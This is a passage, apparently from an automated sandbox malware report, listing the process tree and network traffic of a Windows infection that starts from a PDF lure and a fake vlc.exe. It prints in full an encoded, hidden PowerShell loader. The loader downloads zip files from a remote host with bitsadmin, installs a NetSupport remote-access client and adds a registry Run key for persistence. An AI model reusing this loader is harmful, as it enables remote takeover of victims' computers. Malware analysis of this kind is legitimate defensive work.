VlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"
C:\Windows\SysWOW64\cmd.exe
cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/871dbc7a2ed62746e6998f48369f81dd/" && (for %F in (*.exe) do start "" "%F")"
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe
"vlc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D71D573560E32968EF1981A54ED4FC2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=299A91C9F9ECD525CC4DBC58E58975A9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=299A91C9F9ECD525CC4DBC58E58975A9 --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D86844620FECBE686E79171D2482E499 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D8CBFF90D2EC00165F884839663695C7 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --renderer-client-id=6 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=105BE7FF81EF69CC890FA6834CAC8A6D --mojo-platform-channel-handle=2692 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\AppData\Roaming\TempControll\client32.exe
"C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 45.61.158.86:80 | 45.61.158.86 | tcp |
| US | 8.8.8.8:53 | 86.158.61.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gailsacademy.com | udp |
| NL | 23.254.231.157:443 | gailsacademy.com | tcp |
| US | 8.8.8.8:53 | 157.231.254.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fusion-avto.com | udp |
| CH | 94.247.42.62:443 | fusion-avto.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 104.26.1.231:80 | geo.netsupportsoftware.com | tcp |
| US | 104.26.1.231:80 | geo.netsupportsoftware.com | tcp |
| US | 104.26.1.231:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 62.42.247.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.240.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | availabkelk.store | udp |
| US | 8.8.8.8:53 | questionsmw.store | udp |
| US | 8.8.8.8:53 | soldiefieop.site | udp |
| US | 8.8.8.8:53 | abnomalrkmu.site | udp |
| US | 8.8.8.8:53 | chorusarorp.site | udp |
| US | 8.8.8.8:53 | treatynreit.site | udp |
| US | 8.8.8.8:53 | snarlypagowo.site | udp |
| US | 8.8.8.8:53 | mysterisop.site | udp |
| US | 8.8.8.8:53 | absorptioniw.site | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
